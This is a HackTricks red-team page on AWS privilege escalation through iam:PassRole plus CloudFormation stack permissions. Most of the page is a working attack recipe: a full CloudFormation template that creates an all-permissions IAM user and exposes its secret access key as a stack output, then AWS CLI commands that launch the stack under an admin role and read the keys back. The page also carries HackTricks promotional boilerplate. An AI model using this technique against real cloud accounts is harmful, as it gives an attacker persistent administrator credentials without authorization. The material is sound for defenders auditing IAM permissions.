iam:PassRole, cloudformation:CreateStack,and cloudformation:DescribeStacks

Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!

Other ways to support HackTricks:

If you want to see your company advertised in HackTricks or download HackTricks in PDF Check the SUBSCRIPTION PLANS!
Get the official PEASS & HackTricks swag
Discover The PEASS Family, our collection of exclusive NFTs
Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
Share your hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.

An attacker could for example use a cloudformation template that generates keys for an admin user like:

{
     "Resources": {
         "AdminUser": {
             "Type": "AWS::IAM::User"
         },
         "AdminPolicy": {
             "Type": "AWS::IAM::ManagedPolicy",
                 "Properties": {
                 "Description" : "This policy allows all actions on all resources.",
                 "PolicyDocument": {
                     "Version": "2012-10-17",
                     "Statement": [
                     {
                         "Effect": "Allow",
                         "Action": [
                         "*"
                         ],
                         "Resource": "*"
                     }]
                 },
                 "Users": [{
                     "Ref": "AdminUser"
                 }]
             }
         },
         "MyUserKeys": {
             "Type": "AWS::IAM::AccessKey",
             "Properties": {
                 "UserName": {
                     "Ref": "AdminUser"
                 }
             }
         }
       },
     "Outputs": {
         "AccessKey": {
             "Value": {
                 "Ref": "MyUserKeys"
             },
             "Description": "Access Key ID of Admin User"
         },
         "SecretKey": {
             "Value": {
                 "Fn::GetAtt": [
                 "MyUserKeys",
                 "SecretAccessKey"
                 ]
             },
             "Description": "Secret Key of Admin User"
         }
     }
}

Then generate the cloudformation stack:

aws cloudformation create-stack --stack-name privesc \
    --template-url https://privescbucket.s3.amazonaws.com/IAMCreateUserTemplate.json \
    --role arn:aws:iam::[REDACTED]:role/adminaccess \
    --capabilities CAPABILITY_IAM --region us-west-2

Wait for a couple of minutes for the stack to be generated and then get the output of the stack where the credentials are stored:

aws cloudformation describe-stacks \
    --stack-name arn:aws:cloudformation:us-west2:[REDACTED]:stack/privesc/b4026300-d3fe-11e9-b3b5-06fe8be0ff5e \
    --region uswest-2

References

https://bishopfox.com/blog/privilege-escalation-in-aws

Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!

Other ways to support HackTricks:

If you want to see your company advertised in HackTricks or download HackTricks in PDF Check the SUBSCRIPTION PLANS!
Get the official PEASS & HackTricks swag
Discover The PEASS Family, our collection of exclusive NFTs
Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
Share your hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.

PreviousAWS - Cloudformation Privesc NextAWS - Cognito Privesc

Last updated 2 months ago